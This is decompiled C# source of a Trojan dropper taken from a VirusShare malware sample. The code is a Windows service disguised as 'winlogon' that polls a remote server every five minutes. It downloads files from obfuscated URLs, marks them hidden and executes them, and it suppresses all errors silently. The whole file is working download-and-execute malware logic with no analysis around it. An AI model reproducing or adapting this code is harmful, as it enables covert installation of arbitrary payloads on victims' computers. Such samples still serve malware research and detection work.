// Decompiled with JetBrains decompiler // Type: winlogon.winlogon // Assembly: winlogon, Version=6.1.7601.17514, Culture=neutral, PublicKeyToken=null // MVID: AC059A05-C181-4518-A4B8-9A5E8B3420DD // Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Injector.famp-6427595611179d5d5dac279b1a45e8419adb3bb7a48e56b0dc2408b6a417bbb5.exe using K6lba8gkqFKwGTxlJE; using qpa0K4UP35oevQjLvS; using System; using System.ComponentModel; using System.Diagnostics; using System.IO; using System.Net; using System.Runtime.CompilerServices; using System.Runtime.InteropServices; using System.ServiceProcess; using System.Timers; namespace winlogon { public class winlogon : ServiceBase { private Stream tIkqidsdd; private Stream agHpgdkpf; private string TRGxesqWy; private System.Timers.Timer J4H86ry38; private string IpbRXnHtq; private string ojjvCptCp; private IContainer Ymki2qQIc; [MethodImpl(MethodImplOptions.NoInlining)] public winlogon() { r6O22AEB3hooSSmKYs.eqJZdUAzZVtL9(); this.TRGxesqWy = ipbpJ7ihfEneDowwMq.YHW3lrBiD(0); this.J4H86ry38 = new System.Timers.Timer(); this.IpbRXnHtq = string.Empty; this.ojjvCptCp = string.Empty; // ISSUE: explicit constructor call base.\u002Ector(); this.cpsKDrXGe(); } [MethodImpl(MethodImplOptions.NoInlining)] private void c1SU2WrXB() { try { using (WebClient webClient = new WebClient()) { this.tIkqidsdd = webClient.OpenRead(ipbpJ7ihfEneDowwMq.YHW3lrBiD(42)); this.agHpgdkpf = (Stream) new FileStream(ipbpJ7ihfEneDowwMq.YHW3lrBiD(122), FileMode.Create, FileAccess.Write, FileShare.None); byte[] buffer = new byte[2048]; int count; while ((count = this.tIkqidsdd.Read(buffer, 0, buffer.Length)) > 0) this.agHpgdkpf.Write(buffer, 0, count); } this.tIkqidsdd.Close(); this.agHpgdkpf.Close(); } catch { } } [MethodImpl(MethodImplOptions.NoInlining)] private string eqYl4FZqm() { try { StreamReader streamReader = new StreamReader(WebRequest.Create(ipbpJ7ihfEneDowwMq.YHW3lrBiD(164)).GetResponse().GetResponseStream()); string str1 = string.Empty; for (string str2 = streamReader.ReadLine(); str2 != null; str2 = streamReader.ReadLine()) { Console.WriteLine(str2); if (str2 != null && str2 != string.Empty) str1 = str2; } streamReader.Close(); return str1; } catch { return ipbpJ7ihfEneDowwMq.YHW3lrBiD(240); } } [MethodImpl(MethodImplOptions.NoInlining)] private void egcS2HvT8() { try { using (WebClient webClient = new WebClient()) { string address = this.eqYl4FZqm(); if (address != ipbpJ7ihfEneDowwMq.YHW3lrBiD(264)) { this.tIkqidsdd = webClient.OpenRead(address); this.agHpgdkpf = (Stream) new FileStream(ipbpJ7ihfEneDowwMq.YHW3lrBiD(288), FileMode.Create, FileAccess.Write, FileShare.None); byte[] buffer = new byte[2048]; int count; while ((count = this.tIkqidsdd.Read(buffer, 0, buffer.Length)) > 0) this.agHpgdkpf.Write(buffer, 0, count); } } this.tIkqidsdd.Close(); this.agHpgdkpf.Close(); if (!System.IO.File.Exists(ipbpJ7ihfEneDowwMq.YHW3lrBiD(332))) return; System.IO.File.SetAttributes(ipbpJ7ihfEneDowwMq.YHW3lrBiD(376), FileAttributes.Hidden); } catch { } } [MethodImpl(MethodImplOptions.NoInlining)] private void AXlek072B() { try { if (!System.IO.File.Exists(ipbpJ7ihfEneDowwMq.YHW3lrBiD(420))) return; Process.Start(ipbpJ7ihfEneDowwMq.YHW3lrBiD(464)); } catch { } } [MethodImpl(MethodImplOptions.NoInlining)] private void Fi3kmxHdd() { try { StreamReader streamReader1 = new StreamReader(WebRequest.Create(ipbpJ7ihfEneDowwMq.YHW3lrBiD(508)).GetResponse().GetResponseStream()); string empty1 = string.Empty; for (string str = streamReader1.ReadLine(); str != null; str = streamReader1.ReadLine()) { Console.WriteLine(str); if (str != null && str != string.Empty) this.IpbRXnHtq = str; } streamReader1.Close(); StreamReader streamReader2 = System.IO.File.OpenText(this.TRGxesqWy); string empty2 = string.Empty; for (string str = streamReader2.ReadLine(); str != null; str = streamReader2.ReadLine()) { Console.WriteLine(str); if (str != null && str != string.Empty) this.ojjvCptCp = str; } streamReader2.Close(); if (this.IpbRXnHtq != this.ojjvCptCp) { this.c1SU2WrXB(); this.egcS2HvT8(); this.AXlek072B(); } else if (System.IO.File.Exists(ipbpJ7ihfEneDowwMq.YHW3lrBiD(588))) { this.AXlek072B(); } else { this.egcS2HvT8(); this.AXlek072B(); } } catch { this.AXlek072B(); } } [MethodImpl(MethodImplOptions.NoInlining)] protected override void OnStart(string[] args) { this.J4H86ry38.Interval = 300000.0; this.J4H86ry38.Elapsed += new ElapsedEventHandler(this.LPFCHd2BB); this.J4H86ry38.Start(); } [MethodImpl(MethodImplOptions.NoInlining)] private void LPFCHd2BB([In] object obj0, [In] ElapsedEventArgs obj1) { this.J4H86ry38.Stop(); if (!System.IO.File.Exists(this.TRGxesqWy)) { this.c1SU2WrXB(); this.egcS2HvT8(); this.AXlek072B(); } else this.Fi3kmxHdd(); } [MethodImpl(MethodImplOptions.NoInlining)] protected override void OnStop() => this.J4H86ry38.Stop(); [MethodImpl(MethodImplOptions.NoInlining)] protected override void Dispose(bool disposing) { if (disposing && this.Ymki2qQIc != null) this.Ymki2qQIc.Dispose(); base.Dispose(disposing); } [MethodImpl(MethodImplOptions.NoInlining)] private void cpsKDrXGe() { this.Ymki2qQIc = (IContainer) new Container(); this.ServiceName = ipbpJ7ihfEneDowwMq.YHW3lrBiD(632); } } }